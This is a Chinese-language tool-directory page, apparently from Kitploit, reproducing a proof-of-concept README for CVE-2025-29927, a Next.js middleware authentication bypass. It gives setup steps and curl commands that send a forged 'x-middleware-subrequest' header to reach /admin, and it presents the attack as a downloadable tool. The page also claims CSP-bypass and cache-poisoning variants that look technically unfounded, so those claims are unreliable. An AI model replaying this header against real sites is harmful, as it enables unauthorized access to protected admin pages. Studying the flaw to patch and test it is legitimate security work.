Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
POC-CVE-2025-29927 — CVE-2025-29927 概念验证 | Kitploit
工具/GitHubGitHub/eve-satoru/poc-cve-2025-29927
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用WAF绕过Web安全
GitHubeve-satoru/poc-cve-2025-29927

POC-CVE-2025-29927

CVE-2025-29927 概念验证

查看仓库
3121年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-29927: Next.js 中间件绕过 PoC

概述

该 PoC 演示了 CVE-2025-29927,这是 Next.js 中间件中的一个漏洞,攻击者可以利用 x-middleware-subrequest 头部绕过身份验证、授权和 CSP 机制。

受影响版本

Next.js 版本 11.1.4 至 15.1.7

设置与安装

1️⃣ 克隆并安装 PoC

root@kitploit:~
git clone https://github.com/Eve-SatOrU/POC-CVE-2025-29927.git
cd POC-CVE-2025-29927
cd Demo 
cd my-next-app
npm install
npm run dev

应用将启动于 http://localhost:3000

利用场景

1️⃣ 绕过身份验证与授权(cURL)

1- 使用 x-middleware-subrequest 获取未授权访问:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin

💥 预期结果:即使绕过身份验证,响应也会返回 admin admin。

结果截图

2️⃣ 绕过 CSP 实现 XSS 注入

如果通过中间件强制执行 CSP,则绕过它:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
     -H "Content-Security-Policy: default-src 'self'" \
     http://localhost:3000/admin

💥 预期结果:CSP 被忽略,允许恶意脚本执行。

3️⃣ 缓存投毒拒绝服务(CPDoS)攻击

通过强制畸形响应来利用缓存投毒:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
     -H "Cache-Control: public, max-age=3600" \
     http://localhost:3000/admin

💥 预期结果:页面被缓存为错误内容,干扰正常用户。

缓解策略

  • ✅ 验证中间件逻辑以防止绕过。
  • ✅ 一旦发布修补版本,请升级 Next.js。

致谢

🔍 发现者:Allam Rachid (zhero;) 和 Allam Yasser (inzo_)

下载工具